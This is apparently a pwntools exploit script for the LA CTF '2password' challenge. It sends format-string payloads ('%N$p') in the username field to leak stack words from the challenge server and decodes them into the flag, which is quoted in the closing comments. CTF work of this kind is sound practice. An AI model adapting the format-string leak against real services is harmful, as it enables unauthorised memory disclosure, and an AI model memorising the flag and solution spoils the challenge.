dplastico

2password

#!/usr/bin/env python3

from pwn import *

# Challenge binary (patched to use the shipped loader) plus the libc/ld it
# was patched against. ``elf`` doubles as the pwntools ``context.binary``.
context.binary = elf = ELF("./chall_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

# GDB=1 runs opens gdb in a horizontal tmux split taking 70% of the pane.
context.terminal = ["tmux", "splitw", "-hp", "70"]
#context.log_level = "debug"

# gdb script used by ``gdb.debug`` when the GDB arg is set.
gs = """
b main
continue
"""

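def one_gadget(filename, base_addr=0):
    """Return the one_gadget offsets of *filename*, each rebased by *base_addr*.

    Runs the external ``one_gadget`` tool with ``--raw -l1`` (space-separated
    offsets, constraint level 1) and parses its stdout.

    Args:
        filename: path of the libc to scan. It is passed as a list element,
            so it is never interpreted by a shell.
        base_addr: value added to every offset (normally the leaked libc base).

    Returns:
        list[int] of rebased gadget addresses; empty if the tool printed none.

    Raises:
        FileNotFoundError: if ``one_gadget`` is not installed.
        subprocess.CalledProcessError: if it exits non-zero.
    """
    out = subprocess.check_output(
        ["one_gadget", "--raw", "-l1", filename], text=True
    )
    # split() rather than split(' '): a trailing newline or empty output
    # would otherwise yield '' and int('') raises ValueError.
    # base 0 accepts both decimal and 0x-prefixed offsets.
    return [int(off, 0) + base_addr for off in out.split()]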
#onegadgets = one_gadget('libc.so.6', libc.address)

def start():
    """Open a tube to the challenge, chosen by the pwntools ``args`` flags.

    ``REMOTE=1`` connects to the CTF server, ``GDB=1`` runs the local binary
    under gdb with the ``gs`` script, otherwise a plain local process.
    """
    if args.REMOTE:
        return remote("chall.lac.tf", 31142)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    return process([elf.path])


def rcu(d1, d2=0):
    """Discard tube output through *d1*; optionally return what follows up to *d2*.

    Operates on the module-level tube ``r``. Both delimiters are dropped from
    the result. With the default ``d2=0`` nothing is returned (None).
    """
    r.recvuntil(d1, drop=True)
    if not d2:
        return None
    return r.recvuntil(d2, drop=True)
def libcbase():
    """Log the current libc base (``libc.address``)."""
    log.info("libc base = %#x" % libc.address)


def logleak(name, val):
    """Log *val* as a hex leak labelled *name*."""
    log.info(name + " = %#x" % val)


def sa(delim, data):
    """Send *data* on the tube ``r`` once *delim* has been received."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """Send *line* plus newline on the tube ``r`` once *delim* has been received."""
    return r.sendlineafter(delim, line)


def sl(line):
    """Send *line* plus newline on the tube ``r``."""
    return r.sendline(line)


def bc(value):
    """Return ``str(value)`` as ASCII bytes (e.g. for format-string indices)."""
    return str(value).encode("ascii")


def demangle_base(value):
    """Recover a page-aligned heap base from a safe-linking leak (value << 12)."""
    return value << 0xc


def remangle(heap_base, value):
    """Apply glibc safe-linking mangling: (heap_base >> 12) ^ value."""
    return (heap_base >> 0xc) ^ value

#========= exploit here ===================
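def hex_bytes_to_ascii_little_endian(hex_bytes):
    """Decode a ``%p``-leaked stack word into the text it holds.

    The leak is the hex digits printed after ``0x`` (e.g.
    ``b"7d38367a783063"``). On x86-64 the word is little-endian, so the bytes
    are reversed before decoding to get them in memory order.

    Args:
        hex_bytes: the hex digits as bytes (as the tube returns them) or str.
            A leading ``0x`` is tolerated and stripped.

    Returns:
        The text stored in the word, lowest address first. Bytes that are not
        valid UTF-8 become U+FFFD instead of raising, so a pointer-like slot
        does not abort a scan.

    Raises:
        ValueError: if the input contains non-hex characters.
    """
    if isinstance(hex_bytes, bytes):
        hex_bytes = hex_bytes.decode("ascii")
    digits = hex_bytes.strip()
    if digits.startswith("0x"):
        digits = digits[2:]
    # %p drops leading zeros, so a word whose top byte is < 0x10 arrives with
    # an odd number of digits; bytes.fromhex() rejects that without padding.
    if len(digits) % 2:
        digits = "0" + digits
    word = bytes.fromhex(digits)
    return word[::-1].decode("utf-8", errors="replace")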

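# Format-string leak: the username is echoed through printf ("Incorrect
# password for user ..."), so "%N$p" prints the N-th vararg slot as a hex
# word. Slots 6..15 are dumped one connection at a time; the words that are
# printable text are (presumably) the expected password/flag sitting on the
# stack, 8 little-endian bytes per slot.
for i in range(10):
    offset = i + 6
    r = start()
    try:
        username = b"%" + bc(offset) + b"$p"
        sla(b"username:", username)
        sla(b"password1:", b"AAAAAAAA")
        sla(b"password2", b"BBBBBBBB")
        # Digits after "0x" up to end of line. NOTE: a NULL slot is printed
        # as "(nil)" by glibc, so this recvuntil would then over-read.
        leak = rcu(b"Incorrect password for user 0x", "\n")
        try:
            log.success("slot %d: %s" % (offset, hex_bytes_to_ascii_little_endian(leak)))
        except ValueError:
            # Not a decodable text word (pointer, canary, odd garbage):
            # keep the raw hex instead of aborting the whole scan.
            log.info("slot %d: raw 0x%s" % (offset, leak.decode("ascii", errors="replace")))
        sleep(0.1)
    finally:
        # Always release the process/socket, even if the parse above failed.
        r.close()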

#========= interactive ====================
#lactf{hu
#nter2_cf
#c0xz68}
#lactf{hunter2_cfc0xz68